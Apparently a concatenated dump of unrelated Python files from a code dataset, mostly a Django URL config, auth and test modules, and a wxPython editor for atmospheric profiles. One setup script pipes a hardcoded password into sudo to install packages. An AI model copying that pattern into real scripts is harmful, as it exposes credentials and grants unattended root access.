return zlib.compress(text, 9)
else:
# Custom compress implementation needed to avoid memory leak:
# http://bugs.jython.org/issue1775
# This is based on the zlib.compress in Jython 2.5.2 but has a memory
# leak fix and is also a little faster.
from java.util.zip import Deflater
import jarray
_DEFLATOR = Deflater(9, False)
def _compress(text):
_DEFLATOR.setInput(text)
_DEFLATOR.finish()
buf = jarray.zeros(1024, 'b')
compressed = []
while not _DEFLATOR.finished():
length = _DEFLATOR.deflate(buf, 0, 1024)
compressed.append(buf[:length].tostring())
_DEFLATOR.reset()
return ''.join(compressed)
| 29.862745 | 75 | 0.688772 |
2ddd03343c4cc5c7a0c7e14970fbf03cd3fd21b9 | 914 | py | Python | catalog/reference_book/urls.py | Imbafar/catalog | f4d77f55ad2608ffda518a8b9c8edb82ea3f1c96 | [
"BSD-3-Clause"
] | null | null | null | catalog/reference_book/urls.py | Imbafar/catalog | f4d77f55ad2608ffda518a8b9c8edb82ea3f1c96 | [
"BSD-3-Clause"
] | null | null | null | catalog/reference_book/urls.py | Imbafar/catalog | f4d77f55ad2608ffda518a8b9c8edb82ea3f1c96 | [
"BSD-3-Clause"
] | null | null | null | from django.urls import path
from . import views
app_name = "reference_book"
urlpatterns = [
path(
"",
views.index,
name="index",
),
path(
"reference_book/<int:reference_book_id>/",
views.reference_book_detail,
name="reference_book_detail",
),
path(
"create_reference/",
views.reference_book_create,
name="reference_book_create",
),
path(
"element/<int:element_id>/",
views.element_detail,
name="element_detail",
),
path(
"reference_book/<int:reference_book_id>/edit/",
views.reference_book_edit,
name="reference_book_edit",
),
path(
"element/<int:element_id>/edit/",
views.element_edit,
name="element_edit",
),
path(
"create_element/",
views.element_create,
name="element_create",
),
]
| 20.772727 | 55 | 0.570022 |
fa16e7878927ec2815695c5e46729a04a4c66676 | 1,597 | py | Python | customs/strategies/base_strategy.py | gijswobben/customs | 72c0d071fe35ed84eb6d6371eb651edcd13a1044 | [
"MIT"
] | null | null | null | customs/strategies/base_strategy.py | gijswobben/customs | 72c0d071fe35ed84eb6d6371eb651edcd13a1044 | [
"MIT"
] | null | null | null | customs/strategies/base_strategy.py | gijswobben/customs | 72c0d071fe35ed84eb6d6371eb651edcd13a1044 | [
"MIT"
] | null | null | null | import warnings
from abc import ABC, abstractmethod
from typing import Any, Dict, Optional, Union
from flask.app import Flask
from flask import Request as FlaskRequest
from werkzeug.wrappers import Request
class BaseStrategy(ABC):
def __init__(
self,
) -> None:
# Register this strategy as an available strategy for Customs
from customs.customs import Customs
self._customs: Optional[Customs] = Customs.get_instance()
if self._customs is not None:
self._customs.register_strategy(self.name, self)
else:
warnings.warn(
"Unable to register strategy, make sure to initialize Customs first!"
)
@property # type: ignore
@abstractmethod
def name(self) -> str:
... # pragma: no cover
@name.setter # type: ignore
@abstractmethod
def name(self, new_name: str):
... # pragma: no cover
@abstractmethod
def extract_credentials(
self, request: Union[Request, FlaskRequest]
) -> Dict[str, str]:
... # pragma: no cover
@abstractmethod
def authenticate(self, request: Union[Request, FlaskRequest]) -> Any:
""" Method should return the user info """
... # pragma: no cover
@abstractmethod
def get_or_create_user(self, user: Dict) -> Dict:
... # pragma: no cover
def serialize_user(self, user: Any) -> Dict:
return user
def deserialize_user(self, data: Dict) -> Any:
return data
def register_additional_routes(self, app: Flask) -> None:
...
| 26.180328 | 85 | 0.6268 |
7bb749fdc67863b5fae622015c53444b74fa3ef0 | 599 | py | Python | azure_ad_auth/__init__.py | wintercircle/django-azure-ad-auth | 14fb385fa73695e0d54b8bdc70b8afa37c614821 | [
"BSD-3-Clause"
] | null | null | null | azure_ad_auth/__init__.py | wintercircle/django-azure-ad-auth | 14fb385fa73695e0d54b8bdc70b8afa37c614821 | [
"BSD-3-Clause"
] | null | null | null | azure_ad_auth/__init__.py | wintercircle/django-azure-ad-auth | 14fb385fa73695e0d54b8bdc70b8afa37c614821 | [
"BSD-3-Clause"
] | null | null | null | __version_info__ = {
'major': 1,
'minor': 5,
'micro': 4,
'releaselevel': 'final',
'serial': 11
}
def get_version(short=False):
assert __version_info__['releaselevel'] in ('alpha', 'beta', 'final')
vers = ["%(major)i.%(minor)i" % __version_info__, ]
if __version_info__['micro']:
vers.append(".%(micro)i" % __version_info__)
if __version_info__['releaselevel'] != 'final' and not short:
vers.append('%s%i' % (__version_info__['releaselevel'][0], __version_info__['serial']))
return ''.join(vers)
__version__ = get_version()
| 31.526316 | 96 | 0.609349 |
b350f4c44732fb45f52192fd4ec2635b94ad1fcc | 2,517 | py | Python | tests/testing/theory/test_legaldrinking.py | AndrewQuijano/w4156-lecture-code | fcd2ae27c80cc40dc156b9ca42966fb11073fda8 | [
"Apache-2.0"
] | 5 | 2018-01-25T06:15:24.000Z | 2018-05-19T17:14:18.000Z | tests/testing/theory/test_legaldrinking.py | AndrewQuijano/w4156-lecture-code | fcd2ae27c80cc40dc156b9ca42966fb11073fda8 | [
"Apache-2.0"
] | 1 | 2018-02-06T04:34:11.000Z | 2018-02-06T04:34:11.000Z | tests/testing/theory/test_legaldrinking.py | AndrewQuijano/w4156-lecture-code | fcd2ae27c80cc40dc156b9ca42966fb11073fda8 | [
"Apache-2.0"
] | 51 | 2018-02-04T00:19:35.000Z | 2018-03-06T20:52:23.000Z | import unittest
from lectures.testing.theory.nationality import Nationality
from lectures.testing.theory.legal_drinking_0bug import LegalToDrinkCalculatorBugFreeIHope
from lectures.testing.theory.legal_drinking_1bug import LegalToDrinkCalculatorWithOneBug
from lectures.testing.theory.legal_drinking_2bug import LegalToDrinkCalculatorWithTwoBugs
from typing import Tuple
import tests.helper as helper
class Test100StatementCoverageTwoBugs(unittest.TestCase):
def test_legal_drinking(self):
"""
This one test case shows how we can generate 100% statement coverage but still have a bug
"""
self.assertTrue(LegalToDrinkCalculatorWithTwoBugs.is_legal(21, Nationality.American))
@helper.skip_intentionally_failing()
def test_should_be_illegal_drinking(self):
"""
This second test case here exposes there was still a bug. Remember - the single test case above generated 100%
statement coverage
"""
self.assertFalse(LegalToDrinkCalculatorWithTwoBugs.is_legal(8, Nationality.American))
class Test100BranchCoverageOneBug(unittest.TestCase):
def test_legal(self):
self.assertTrue(LegalToDrinkCalculatorWithOneBug.is_legal(21, Nationality.American))
def test_illegal(self):
"""
We fix the code and add this test cases now fails
"""
self.assertFalse(LegalToDrinkCalculatorWithOneBug.is_legal(8, Nationality.American))
@helper.skip_intentionally_failing()
def test_illegal_british(self):
"""
The above two test cases hit 100% branch coverage. However, there is still a bug.
This test cases exposes the bug
"""
self.assertFalse(LegalToDrinkCalculatorWithOneBug.is_legal(17, Nationality.British))
class TestConditionCoverageNoBugs(unittest.TestCase):
def push_assert(self, tple: Tuple):
legal = LegalToDrinkCalculatorBugFreeIHope.is_legal(tple[0], tple[1])
self.assertTrue(legal == tple[2])
def test_legal_drinking(self):
cases = [(21, Nationality.American, True), # hits statement coverage
(20, Nationality.American, False), # hits branch coverage
(18, Nationality.British, True), # hits condition coverage (evaluated to false previously)
(17, Nationality.British, False), # (multiple condition coverage)
]
list(map(lambda x: self.push_assert((x[0], x[1], x[2])), cases))
if __name__ == '__main__':
unittest.main()
| 38.723077 | 118 | 0.716329 |
8f905d66f331b920b938dc83d5109a4bcc9fa86d | 620 | py | Python | setup.py | choki0715/lecture | 2904b20387925c7f33db9ecd85fc71adf2750f3d | [
"MIT"
] | 4 | 2018-09-12T04:49:47.000Z | 2020-07-14T00:12:09.000Z | setup.py | choki0715/lecture | 2904b20387925c7f33db9ecd85fc71adf2750f3d | [
"MIT"
] | null | null | null | setup.py | choki0715/lecture | 2904b20387925c7f33db9ecd85fc71adf2750f3d | [
"MIT"
] | 7 | 2018-09-10T09:28:43.000Z | 2019-12-20T01:46:25.000Z | import subprocess
install_cmd_list = [
'echo "passwd" | sudo -S apt -y install virtualenv git python3-tk',
'virtualenv -p python3 /home/user/multicamp',
'/home/user/multicamp/bin/pip3 install --upgrade tensorflow==1.14 matplotlib ipykernel jupyter music21 gym',
'/home/user/multicamp/bin/python3 -m ipykernel install --user',
]
for install_cmd in install_cmd_list:
install_proc = subprocess.Popen(install_cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
while install_proc.poll() is None:
out = install_proc.stdout.readline()
print(out.decode('utf-8'), end='')
| 44.285714 | 112 | 0.722581 |
a01836d12bd9fab41be16ee6d318addd37e3967f | 33,352 | py | Python | source/gui/rview/profileframe.py | bucricket/projectMAScorrection | 89489026c8e247ec7c364e537798e766331fe569 | [
"BSD-3-Clause"
] | null | null | null | source/gui/rview/profileframe.py | bucricket/projectMAScorrection | 89489026c8e247ec7c364e537798e766331fe569 | [
"BSD-3-Clause"
] | 1 | 2022-03-12T12:19:59.000Z | 2022-03-12T12:19:59.000Z | source/gui/rview/profileframe.py | bucricket/projectMAScorrection | 89489026c8e247ec7c364e537798e766331fe569 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
import wx
import rmodel
import util
import locale
import wxmpl
import numpy
import matplotlib
import wx.lib.agw.floatspin as FS
from profileframeutils import Data, GenericPlotItemPanel, MyNotebook
from profileframeutils import PlotItemPanelAll
from util import kindOfItem, axesDef
import copy
locale.setlocale(locale.LC_ALL, '')
class ComputeDialog(wx.Dialog):
def __init__(
self, parent, ID, title, text="", pmin0=0, pmax0=1000, scale0=1.,
offset0=0., increment=None, size=wx.DefaultSize,
pos=wx.DefaultPosition,
style=wx.DEFAULT_DIALOG_STYLE,
useMetal=False, limits_scale=(0.01, 10), limits_offset=(-100, 100)
):
# Instead of calling wx.Dialog.__init__ we precreate the dialog
# so we can set an extra style that must be set before
# creation, and then we create the GUI object using the Create
# method.
if increment is None:
increment = 10.
pre = wx.PreDialog()
pre.SetExtraStyle(wx.DIALOG_EX_CONTEXTHELP)
pre.Create(parent, ID, title, pos, size, style)
# This next step is the most important, it turns this Python
# object into the real wrapper of the dialog (instead of pre)
# as far as the wxPython extension is concerned.
self.PostCreate(pre)
# This extra style can be set after the UI object has been created.
if 'wxMac' in wx.PlatformInfo and useMetal:
self.SetExtraStyle(wx.DIALOG_EX_METAL)
# Now continue with the normal construction of the dialog
# contents
sizer = wx.BoxSizer(wx.VERTICAL)
label = wx.StaticText(self, -1, text)
label.SetHelpText("help text")
sizer.Add(label, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
# box 1 pmin
box = wx.BoxSizer(wx.HORIZONTAL)
label = wx.StaticText(self, -1, "p min:")
box.Add(label, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
self.pminFS = FS.FloatSpin(self, -1, min_val=0.00001, max_val=1150,
digits=3, value=pmin0,
increment=increment, agwStyle=FS.FS_LEFT)
box.Add(self.pminFS, 1, wx.ALIGN_CENTRE | wx.ALL, 5)
sizer.Add(box, 0, wx.GROW | wx.ALIGN_CENTER_VERTICAL | wx.ALL, 5)
# box 2 pmax
box = wx.BoxSizer(wx.HORIZONTAL)
label = wx.StaticText(self, -1, "p max:")
box.Add(label, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
self.pmaxFS = FS.FloatSpin(self, -1, min_val=0.00001, max_val=1150,
digits=3, value=pmax0,
increment=increment, agwStyle=FS.FS_LEFT)
box.Add(self.pmaxFS, 1, wx.ALIGN_CENTRE | wx.ALL, 5)
sizer.Add(box, 0, wx.GROW | wx.ALIGN_CENTER_VERTICAL | wx.ALL, 5)
# box 3 scale
box = wx.BoxSizer(wx.HORIZONTAL)
label = wx.StaticText(self, -1, "scale:")
box.Add(label, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
self.scale = FS.FloatSpin(self, -1, min_val=limits_scale[0],
max_val=limits_scale[1], digits=2,
value=scale0,
increment=1, agwStyle=FS.FS_LEFT)
box.Add(self.scale, 1, wx.ALIGN_CENTRE | wx.ALL, 5)
# box 4 offset
label = wx.StaticText(self, -1, "offset:")
box.Add(label, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
self.offset = FS.FloatSpin(self, -1, min_val=limits_offset[0],
max_val=limits_offset[1], digits=3,
value=offset0,
increment=1, agwStyle=FS.FS_LEFT)
box.Add(self.offset, 1, wx.ALIGN_CENTRE | wx.ALL, 5)
sizer.Add(box, 0, wx.GROW | wx.ALIGN_CENTER_VERTICAL | wx.ALL, 5)
line = wx.StaticLine(self, -1, size=(20, -1), style=wx.LI_HORIZONTAL)
sizer.Add(line, 0, wx.GROW | wx.ALIGN_CENTER_VERTICAL |
wx.RIGHT | wx.TOP, 5)
# buttons
btnsizer = wx.StdDialogButtonSizer()
btn = wx.Button(self, wx.ID_OK)
btn.SetDefault()
btnsizer.AddButton(btn)
btn = wx.Button(self, wx.ID_CANCEL)
btnsizer.AddButton(btn)
btnsizer.Realize()
sizer.Add(btnsizer, 0, wx.ALIGN_CENTER_VERTICAL | wx.ALL, 5)
self.SetSizer(sizer)
sizer.Fit(self)
self.Show()
def GetSelections(self):
return (self.pminFS.GetValue(), self.pmaxFS.GetValue(),
self.scale.GetValue(), self.offset.GetValue())
class AxesDialog(wx.Dialog):
def __init__(
self, parent, ID, title, text="", xmin0=0, xmax0=0,
scale="linear", increment=None, size=wx.DefaultSize,
pos=wx.DefaultPosition,
style=wx.DEFAULT_DIALOG_STYLE,
useMetal=False,
):
# Instead of calling wx.Dialog.__init__ we precreate the dialog
# so we can set an extra style that must be set before
# creation, and then we create the GUI object using the Create
# method.
if increment is None:
increment = 10
pre = wx.PreDialog()
pre.SetExtraStyle(wx.DIALOG_EX_CONTEXTHELP)
pre.Create(parent, ID, title, pos, size, style)
# This next step is the most important, it turns this Python
# object into the real wrapper of the dialog (instead of pre)
# as far as the wxPython extension is concerned.
self.PostCreate(pre)
# This extra style can be set after the UI object has been created.
if 'wxMac' in wx.PlatformInfo and useMetal:
self.SetExtraStyle(wx.DIALOG_EX_METAL)
# Now continue with the normal construction of the dialog
# contents
sizer = wx.BoxSizer(wx.VERTICAL)
label = wx.StaticText(self, -1, text)
label.SetHelpText("help text")
sizer.Add(label, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
# box 1 xmin
box = wx.BoxSizer(wx.HORIZONTAL)
label = wx.StaticText(self, -1, "x min:")
box.Add(label, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
self.xminFS = FS.FloatSpin(self, -1, min_val=0, max_val=1000000000,
digits=2, value=xmin0,
increment=increment, agwStyle=FS.FS_LEFT)
box.Add(self.xminFS, 1, wx.ALIGN_CENTRE | wx.ALL, 5)
sizer.Add(box, 0, wx.GROW | wx.ALIGN_CENTER_VERTICAL | wx.ALL, 5)
# box 2 xmax
box = wx.BoxSizer(wx.HORIZONTAL)
label = wx.StaticText(self, -1, "x max:")
box.Add(label, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
self.xmaxFS = FS.FloatSpin(self, -1, min_val=0, max_val=1000000000,
digits=2, value=xmax0,
increment=increment, agwStyle=FS.FS_LEFT)
box.Add(self.xmaxFS, 1, wx.ALIGN_CENTRE | wx.ALL, 5)
sizer.Add(box, 0, wx.GROW | wx.ALIGN_CENTER_VERTICAL | wx.ALL, 5)
# buttons
btnsizer = wx.StdDialogButtonSizer()
btn = wx.Button(self, wx.ID_OK)
btn.SetDefault()
btnsizer.AddButton(btn)
btn = wx.Button(self, wx.ID_CANCEL)
btnsizer.AddButton(btn)
btnsizer.Realize()
sizer.Add(btnsizer, 0, wx.ALIGN_CENTER_VERTICAL | wx.ALL, 5)
self.SetSizer(sizer)
sizer.Fit(self)
self.Show()
def GetSelections(self):
return (self.xminFS.GetValue(), self.xmaxFS.GetValue())
class PlotItemPanel(GenericPlotItemPanel):
""" plot on a PlotPanel one curve """
def __init__(self, parent, value, pression, theName, liste_item=None,
kind="GASES", xlegend="ppmv",
layerstyle=False, layer=None, yInPressions=True, tskin=None):
edit = True
GenericPlotItemPanel.__init__(self, parent, value, pression, theName,
liste_item,
kind=kind, xlegend=xlegend,
edit=edit, layerstyle=layerstyle,
layer=layer, yInPressions=yInPressions,
tskin=tskin)
def ComputeProfile(self, pmin, pmax, scale, offset):
""" change the values of the profile between pmin and pmax :
multiply by scale and add offset """
if not self.layerstyle:
y = numpy.zeros(self.x.shape[0]) + self.x
self.valueHistory.append(y)
for i in range(self.x.shape[0]):
p = self.pression[i]
if p >= pmin and p <= pmax:
val = self.x[i]
self.x[i] = max(0.0001, scale * val + offset)
self.data.setChanged(True)
self.data.myUpdate(self.x, self.y)
self.Update()
else:
y = numpy.zeros(self.xlayeritem.shape[0]) + self.xlayeritem
self.valueHistory.append(y)
for i in range(self.xlayeritem.shape[0]):
p = self.ylayeritem[i]
if p >= pmin and p <= pmax:
self.xlayeritem[i] = max(
0, scale * self.xlayeritem[i] + offset)
self.data.setChanged(True)
self.data.myUpdate(self.xlayeritem, self.ylayeritem)
self.x = self.myLayeritem.getLayeritem(self.xlayeritem)
self.Update()
class ProfileView(util.GenericViewRadio):
""" Profile window of the application """
helpTitle = "Help Profile"
helpMessage = """
Select and visualize a component profile on the right panel
Click the middle button or the right button to modify the profile.
Use the matplotlib toolbar to zoom.
Apply your changes or save the profile
for the next run of RTTOV.
"""
def __init__(self, parent, profile, edit=True, controler=None):
self.edit = edit
self.myProfileRef = profile
self.myProfile = copy.deepcopy(profile)
self.my_list_cloud = []
self.myControler = controler
for cloud in self.myProfile.cloud_list:
self.my_list_cloud.append(cloud)
self.my_list_cloud.append("CFRAC")
self.my_list_cloud.append("CLW")
util.GenericView.__init__(self, parent, "profile")
sizer = wx.BoxSizer(wx.HORIZONTAL)
self.SetSizer(sizer)
self.CreateMenuBar()
self.SetSize((1300, 700))
self.SetMinSize((1300, 700))
self.SetTitle('PROFILE EDITOR')
self._ComputeLayers(self.myProfile['P'])
# panel 1 notebook with all curves (GASES, AEROSOLS, CLOUDS)
self.panel1 = wx.Panel(self, -1, style=wx.BORDER_SIMPLE)
self.panel1.SetSize((200, 500))
sizer.Add(self.panel1, 1, wx.EXPAND)
# creation of notebook for the panel 1
self.nb_all = MyNotebook(self.panel1, isRightPage=False)
sizer1 = wx.BoxSizer()
sizer1.Add(self.nb_all, 1, wx.EXPAND)
self.panel1.SetSizer(sizer1)
# panel 2 notebook with one curve
self.panel2 = wx.Panel(self, -1, style=wx.BORDER_SIMPLE)
sizer.Add(self.panel2, 1, wx.EXPAND)
# creation of the notebook for the panel 2
self.nb = MyNotebook(self.panel2)
self.axesDef = []
# creation des graphiques
self.Plot(self.myProfile)
# create a second sizer for the notebook
sizer2 = wx.BoxSizer()
sizer2.Add(self.nb, 1, wx.EXPAND)
self.panel2.SetSizer(sizer2)
self.sb = self.CreateStatusBar()
self.sb.SetBackgroundColour('WHITE')
txt = ''
self.sb.SetStatusText(txt)
self.Centre()
self.Show(True)
def PlotLeft(self):
# plot panel 1 with all gas
self.allGraphicsPages = {}
self.allGraphicsPages['GASES'] = PlotItemPanelAll(
self.nb_all,
self.myProfile,
kind='GASES',
xlegend=self.myProfile.gas_units_legend,
xlegendT="Temperature (K)",
tickSize=10)
self.nb_all.AddPage(self.allGraphicsPages['GASES'], 'GASES')
if self.myProfile.anyAerosol():
self.allGraphicsPages['AEROSOLS'] = PlotItemPanelAll(
self.nb_all,
self.myProfile,
kind="AEROSOLS",
layer=self.layer,
xlegend="number density (cm-3)",
xlegendT="Temperature (K)",
XinLog=True,
tickSize=10)
self.nb_all.AddPage(self.allGraphicsPages['AEROSOLS'], 'AEROSOLS')
if self.myProfile.anyCloud():
self.allGraphicsPages['CLOUDS'] = PlotItemPanelAll(
self.nb_all,
self.myProfile,
kind="CLOUDS",
layer=self.layer,
xlegend="layer mean content (g/m3)",
xlegendT="Temperature (K)",
XinLog=True,
tickSize=10)
self.nb_all.AddPage(self.allGraphicsPages['CLOUDS'], 'CLOUDS')
def Plot(self, profile=None):
if profile is not None:
self.myProfileRef = profile
self.myProfile = copy.deepcopy(profile)
self._ComputeLayers(self.myProfile['P'])
self.graphicPages = {}
self.graphicPages['T'] = PlotItemPanel(self.nb, self.myProfile['T'],
self.myProfile['P'],
theName='T',
xlegend="temperature (K)")
self.nb.AddPage(self.graphicPages['T'], 'T')
self.graphicPages['T'].ConnectCanvasEVT_POINT(self.OnPoint)
for gas in self.myProfile.gas_list:
if self.myProfile[gas] is not None:
self.graphicPages[gas] = PlotItemPanel(
self.nb,
self.myProfile[gas],
self.myProfile['P'],
xlegend=self.myProfile.gas_units_legend,
theName=gas)
self.nb.AddPage(self.graphicPages[gas], gas)
self.graphicPages[gas].ConnectCanvasEVT_POINT(self.OnPoint)
if self.myProfile.anyAerosol():
for aerosol in self.myProfile.aerosol_list:
if self.myProfile[aerosol] is not None:
self.graphicPages[aerosol] = PlotItemPanel(
self.nb,
self.myProfile[aerosol],
self.myProfile['P'],
theName=aerosol,
kind="AEROSOLS",
layerstyle=True,
xlegend="number density (cm-3)",
layer=self.layer)
self.nb.AddPage(self.graphicPages[aerosol], aerosol)
self.graphicPages[
aerosol].ConnectCanvasEVT_POINT(self.OnPoint)
if self.myProfile.anyCloud():
for cloud in self.my_list_cloud:
if self.myProfile[cloud] is not None:
if cloud == "CFRAC":
mylegend = "CFRAC"
else:
mylegend = "layer mean content (g/m3)"
self.graphicPages[cloud] = PlotItemPanel(
self.nb,
self.myProfile[cloud],
self.myProfile['P'],
theName=cloud,
kind="CLOUDS",
layerstyle=True,
xlegend=mylegend,
layer=self.layer)
self.nb.AddPage(self.graphicPages[cloud], cloud)
self.graphicPages[
cloud].ConnectCanvasEVT_POINT(self.OnPoint)
# delete empty graphicPages
for key in self.graphicPages.keys():
if self.myProfile[key] is None:
del self.graphicPages[key]
# plot panel 1 with all gas
self.PlotLeft()
def OnPoint(self, e):
""" update the graphic when receive event e """
wx.BeginBusyCursor()
wx.SafeYield(None, True)
cp = self.nb.GetCurrentPage()
hasDoSomething = cp.OnPoint(e)
if hasDoSomething:
self.UpdateAllGraphics()
wx.EndBusyCursor()
def UpdateAllGraphics(self):
""" update the left panel after getting all information
from the right panels"""
# get the name of the RightPlotPanel
cp = self.nb.GetCurrentPage()
theName = cp.theName
theKind = cp.kind
self.GetProfile()
# update the profile with curves from all rights panels
self.allGraphicsPages[theKind].UpdateData(self.myProfile, theName)
if theName == "T":
for kind in ("AEROSOLS", "CLOUDS"):
if kind in self.allGraphicsPages:
self.allGraphicsPages[kind].UpdateData(
self.myProfile, theName)
def _ComputeLayers(self, pression):
""" Compute the mean value of pression in a layer """
foo = numpy.empty(pression.shape[0] - 1)
for i in range(foo.shape[0]):
foo[i] = (pression[i + 1] + pression[i]) / 2
self.layer = foo
def _MakeBinding(self):
""" set the trivial Binding for the View """
# binding cancel button
def GetProfile(self):
""" return the profile as modified by the edition frame """
self.write("Get profile from the edition panels")
self.myProfile["T"] = self.graphicPages["T"].GetItem()
for gas in self.myProfile.gas_list:
if self.myProfile[gas]is not None:
self.myProfile[gas] = self.graphicPages[gas].GetItem()
if self.myProfile.anyAerosol:
for aerosol in self.myProfile.aerosol_list:
if self.myProfile[aerosol] is not None:
self.myProfile[aerosol] = self.graphicPages[
aerosol].GetItem()
if self.myProfile.anyCloud:
for item in self.my_list_cloud:
if self.myProfile[item] is not None:
self.myProfile[item] = self.graphicPages[item].GetItem()
return self.myProfile
def RePlotAll(self, profile=None):
""" Plot the 2 panels with (new) profile (delete everything
before redraw) """
if profile is not None:
self.myProfileRef = profile
self.myProfile = copy.deepcopy(profile)
self._ComputeLayers(self.myProfile['P'])
# remove all pages of the notebook
self.nb.DeleteAllPages()
self.nb_all.DeleteAllPages()
self.Plot()
def RePlotAllLeftPanel(self, profile=None):
""" Plot the left panel with (new) profile (delete everything
before redraw) """
if profile is not None:
self.myProfileRef = profile
self.myProfile = copy.deepcopy(profile)
self._ComputeLayers(self.myProfile['P'])
# remove all pages of the notebook
self.nb_all.DeleteAllPages()
self.PlotLeft()
def deleteRightPage(self, item):
""" delete the item page """
# delete the notebook page
# delete the graphic page
for i in range(self.nb.GetPageCount()):
if self.nb.GetPageText(i) == item:
self.graphicPages[item].DisconnectCanvasEVT_POINT()
self.nb.DeletePage(i)
self.graphicPages.pop(item)
break
kind = kindOfItem[item]
if kind == "CLOUDS" and not self.myProfile.anyCloud():
if 'CFRAC' in self.graphicPages:
self.deleteRightPage('CFRAC')
if 'CLW' in self.graphicPages:
self.deleteRightPage('CLW')
def addRightPage(self, item):
""" add an new item page """
kind = kindOfItem[item]
if kind == "GASES":
myY = self.myProfile['P']
myLayerstyle = False
else:
myY = self.layer
myLayerstyle = True
self.graphicPages[item] = PlotItemPanel(
self.nb, self.myProfile[item], self.myProfile['P'],
theName=item, kind=kind,
layerstyle=myLayerstyle,
xlegend=self.myProfile.gas_units_legend, layer=myY)
self.nb.AddPage(self.graphicPages[item], item)
if kind == "CLOUDS":
if 'CFRAC' not in self.graphicPages:
item = 'CFRAC'
self.graphicPages[item] = PlotItemPanel(
self.nb, self.myProfile[item], self.myProfile['P'],
theName=item, kind=kind,
layerstyle=True,
xlegend="CFRAC", layer=myY)
self.nb.AddPage(self.graphicPages[item], item)
self.graphicPages[item].ConnectCanvasEVT_POINT(self.OnPoint)
def replotLeftPage(self):
""" replot the left panel """
self.RePlotAllLeftPanel()
def OnUndo(self, e):
pageName = self.nb.GetPage(self.nb.GetSelection()).theName
self.graphicPages[pageName].OnUndo()
self.UpdateAllGraphics()
def OnRedo(self, e):
pageName = self.nb.GetPage(self.nb.GetSelection()).theName
self.graphicPages[pageName].OnRedo()
self.UpdateAllGraphics()
def OnClose(self, e):
""" close the profile windows"""
print ">>> Close profileView"
if self.myControler is not None:
self.myControler.profileView = None
self.Close()
def OnControlCFRAC(self):
""" Control CFRAC versus Clouds and update the graphic if necessary """
self.myProfile.ctrlCoherenceClouds()
if 'CFRAC' in self.graphicPages:
self.graphicPages['CFRAC'].UpdateData(self.myProfile['CFRAC'])
def OnSaveProfile(self, e):
""" return the name for a profile File """
self.myProfile = self.GetProfile()
self.OnControlCFRAC()
fileSaved = self.OnSaveFile(e, "Save a profile")
return fileSaved
def OnApplyChange(self, e):
""" get profile change from panels and return a profile """
self.myProfile = self.GetProfile()
self.OnControlCFRAC()
return self.myProfile
def OnSaveProfileAs(self, e):
""" return the name for a profile File """
self.myProfile = self.GetProfile()
self.OnControlCFRAC()
fileSaved = self.OnSaveFile(e, "Save a profile")
return fileSaved
def OnInsert(self, e):
for item in self.graphicPages.keys():
self.graphicPages[item].onInsert = True
def OnRemove(self, e):
for item in self.graphicPages.keys():
self.graphicPages[item].onInsert = False
def OnAddgas(self, e):
self.changeItem(self.myProfile.gas_list, "no gas to add",
"Choose the gases to add to the profile",
self.myProfile.addGas, False)
def OnAddAerosol(self, e):
self.changeItem(self.myProfile.aerosol_list, "no aerosol to add",
"Choose the aerosols to add to the profile",
self.myProfile.addAerosol, False, kind="AEROSOLS")
def OnAddCloud(self, e):
self.changeItem(self.myProfile.cloud_list, "no layeritem to remove",
"Choose the clouds to add to the profile",
self.myProfile.addCloud, False, kind="CLOUDS")
def OnRemovegas(self, e):
self.changeItem(self.myProfile.gas_list, "no gas to remove",
"Choose the gases to remove from the profile",
self.myProfile.removeGas)
def OnRemoveAerosol(self, e):
self.changeItem(self.myProfile.aerosol_list, "no aerosol to remove",
"Choose the aerosols to remove from the profile",
self.myProfile.removeAerosol, kind="AEROSOLS")
def OnRemoveCloud(self, e):
self.changeItem(self.myProfile.cloud_list, "no layeritem to remove",
"Choose the clouds to remove from the profile",
self.myProfile.removeCloud, kind="CLOUDS")
def changeItem(self, liste_item, message1, message2, action, remove=True,
kind="GASES"):
""" perform the action on self.myProfile """
wx.BeginBusyCursor()
myList = []
if remove:
for item in liste_item:
# cannot remove 'Q'
if not (item == 'Q'):
if self.myProfile[item] is not None:
myList.append(item)
else:
for item in liste_item:
if self.myProfile[item] is None:
myList.append(item)
if myList == []:
self.ShowInfoMessage(message1)
else:
list_to_change = self. ShowDialogList(message2, myList)
if list_to_change is not None:
for item in list_to_change:
action(item)
if remove:
self.deleteRightPage(item)
else:
self.addRightPage(item)
# controle the coherence of clouds
if kind == "CLOUDS":
print "control coherence layeritem recompute CFRAC"
self.OnControlCFRAC()
self.replotLeftPage()
wx.EndBusyCursor()
def OnReplaceAerosolByClim(self, e):
listItem = ["Continental clean", "Continental average",
"Continental polluted", "Urban",
"Desert", "Maritime clean", "Maritime polluted",
"Maritime tropical", "Arctic", "Antarctic"]
selection = self.ShowDialogSingleChoice("Choose climatology", listItem)
if selection is not None:
self.write("replace aerosols by climatology " +
str(listItem[selection]))
self.myProfile.replaceByAerosolClim(selection + 1)
self.RePlotAll()
def ShowDialogSingleChoice(self, label, listItem):
selection = None
dlg = wx.SingleChoiceDialog(self, label, "", listItem)
if (dlg.ShowModal() == wx.ID_OK):
selection = dlg.GetSelection()
self.write("Selection: " + str(selection))
dlg.Destroy()
return selection
def ShowDialogList(self, label, listItem):
strings = None
dlg = wx.MultiChoiceDialog(self, label, "", listItem)
if (dlg.ShowModal() == wx.ID_OK):
selections = dlg.GetSelections()
strings = [listItem[x] for x in selections]
self.write("Selections: " + str(strings))
dlg.Destroy()
return strings
def OnMouseMove(self, e):
""" print x y value of the left plot in the status bar """
pass
def OnEditXAxe(self, e):
self.GetProfile()
mypage = self.nb.GetCurrentPage()
item = mypage.theName
(xmin, xmax) = mypage.axes.get_xlim()
theScale = mypage.axes.get_xscale()
if mypage.kind == "CLOUDS":
theIncrement = 0.1
else:
theIncrement = 10
dlg = AxesDialog(self, -1, "X axe edit",
text="enter X limits for " + item,
xmin0=xmin, xmax0=xmax, scale=theScale,
increment=theIncrement)
if (dlg.ShowModal() == wx.ID_OK):
(xmin, xmax) = dlg.GetSelections()
self.graphicPages[item].SetXlimits(xmin=xmin, xmax=xmax)
self.graphicPages[item].Update()
dlg.Close()
def OnChangeProfile(self, e):
self.GetProfile()
